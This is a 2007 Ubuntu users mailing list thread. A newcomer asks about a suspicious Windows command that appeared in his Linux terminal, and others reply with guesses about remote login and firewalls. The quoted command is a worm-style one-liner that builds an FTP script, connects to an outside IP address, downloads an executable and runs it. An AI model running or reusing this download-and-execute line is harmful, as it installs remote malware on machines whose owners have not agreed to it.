Antivirus program for ubuntu feisty amd64
Lucio M Nicolosi
lmario at philippe.com.br
Sat May 12 05:12:39 UTC 2007
> Lucio M Nicolosi wrote:
>> Mario Vukelic wrote:
>>>> You would not have had any infections on Linux without the antivir
>>>> program either, since there are no Linux viruses in the wild :)
>> New to Linux, installed a Ubuntu 6.10 partition (for tests) in my office
>> desktop, connected to Novell Netware and an ADSL link (Suse Linux Proxy
>> and Firewall).
>> A couple of days ago noticed an application suddenly taking control of
>> the terminal window and running the following script:
>> (user)@phil:~$ 5~.~
>> (user)@phil::~$ %systemroot%\system32\cmd.exe
>> (user)@phil:~$ cmd /c echo open 184.108.40.206 42043 >> ik &echo
>> user t g >> ik &echo get eu.exe >> ik &echo bye >> ik &ftp -n -v -s:ik
>> &del ik &eu.exe &exit
>> from the script "ik" in /home/(user)
>> Could't find any "ik" script in my home (Ubuntu 7.04) desktop.
>> Looked like a worm, then I run antivirus on Win partition, looked for
>> the Windows "eu.exe" virus and variants but found no trace of it, at
>> least on my desktop.
>> Has anyone any idea of what kind of script is this?
> More then likely, someone logged on to your computer (looks like they
> did it through telnet, but i could be wrong). In that case, either hook
> your computer into a firewall or download one for linux (which linux
> doesnt really need one, but if you are using your system for large-scale
> business, then its a good idea to get a firewall)
> Sometimes i have noticed that when somebody logs on to my system and
> runs there script (yes i was hacked once..good thing my firewall blocked
> the attack...but it didnt catch the remote login?), it doesnt execute
> right..just fyi..most of the time it does though, especially when DoSing.
Since my Intranet is already behind a (Suse) firewall, I was wondering
if (either it was invaded or) a worm residing on another (Win) desktop
could take control of my (Linux) terminal and run this script to try
install itself in the Win environment. Since it apparently happened in
two different ocasions, it looks like an autorun script. Could you tell
me where to find the autorun config file in Ubuntu?
Tks for the answer, cj.
More information about the ubuntu-users